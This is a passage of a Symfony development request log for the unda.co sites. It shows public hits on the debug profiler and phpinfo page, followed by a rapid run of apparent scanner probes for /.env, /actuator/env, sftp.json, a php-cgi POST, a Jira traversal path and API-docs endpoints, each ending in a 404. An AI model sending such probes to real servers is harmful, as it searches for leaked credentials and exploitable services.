  4058. [2025-12-18 16:09:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  4059. [2025-12-18 16:09:58] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"a922fd","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/a922fd","method":"GET"} []
  4060. [2025-12-18 16:11:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=time","method":"GET"} []
  4061. [2025-12-18 16:11:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4062. [2025-12-18 16:18:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4063. [2025-12-18 16:19:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=security","method":"GET"} []
  4064. [2025-12-18 16:19:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4065. [2025-12-18 16:20:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4066. [2025-12-18 16:25:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4067. [2025-12-18 16:26:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8098e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8098e0?panel=dump","method":"GET"} []
  4068. [2025-12-18 16:26:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  4069. [2025-12-18 16:28:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=request","method":"GET"} []
  4070. [2025-12-18 16:28:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4071. [2025-12-18 16:28:32] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://www.unda.co/_profiler/phpinfo","method":"GET"} []
  4072. [2025-12-18 16:29:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4073. [2025-12-18 16:29:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wiki"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wiki\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4074. [2025-12-18 16:36:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b0d4a4","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/b0d4a4?panel=logger","method":"GET"} []
  4075. [2025-12-18 16:36:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  4076. [2025-12-18 16:36:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=config","method":"GET"} []
  4077. [2025-12-18 16:36:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4078. [2025-12-18 16:45:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=cache","method":"GET"} []
  4079. [2025-12-18 16:45:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4080. [2025-12-18 16:47:52] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  4081. [2025-12-18 16:47:54] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  4082. [2025-12-18 16:47:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4083. [2025-12-18 16:47:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4084. [2025-12-18 16:47:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4085. [2025-12-18 16:47:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4086. [2025-12-18 16:47:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.66.45&limit=10","method":"GET"} []
  4087. [2025-12-18 16:47:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.66.45&limit=10","method":"GET"} []
  4088. [2025-12-18 16:47:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4089. [2025-12-18 16:48:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4090. [2025-12-18 16:48:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4091. [2025-12-18 16:48:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4092. [2025-12-18 16:48:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4093. [2025-12-18 16:48:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4094. [2025-12-18 16:48:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4095. [2025-12-18 16:48:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4096. [2025-12-18 16:48:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4097. [2025-12-18 16:48:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4098. [2025-12-18 16:48:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4099. [2025-12-18 16:48:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4100. [2025-12-18 16:48:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4101. [2025-12-18 16:48:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4102. [2025-12-18 16:48:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4103. [2025-12-18 16:48:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4104. [2025-12-18 16:48:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4105. [2025-12-18 16:48:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4106. [2025-12-18 16:48:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4107. [2025-12-18 16:48:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4108. [2025-12-18 16:48:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4109. [2025-12-18 16:48:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4110. [2025-12-18 16:48:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4111. [2025-12-18 16:48:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4112. [2025-12-18 16:48:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4113. [2025-12-18 16:48:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4114. [2025-12-18 16:48:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
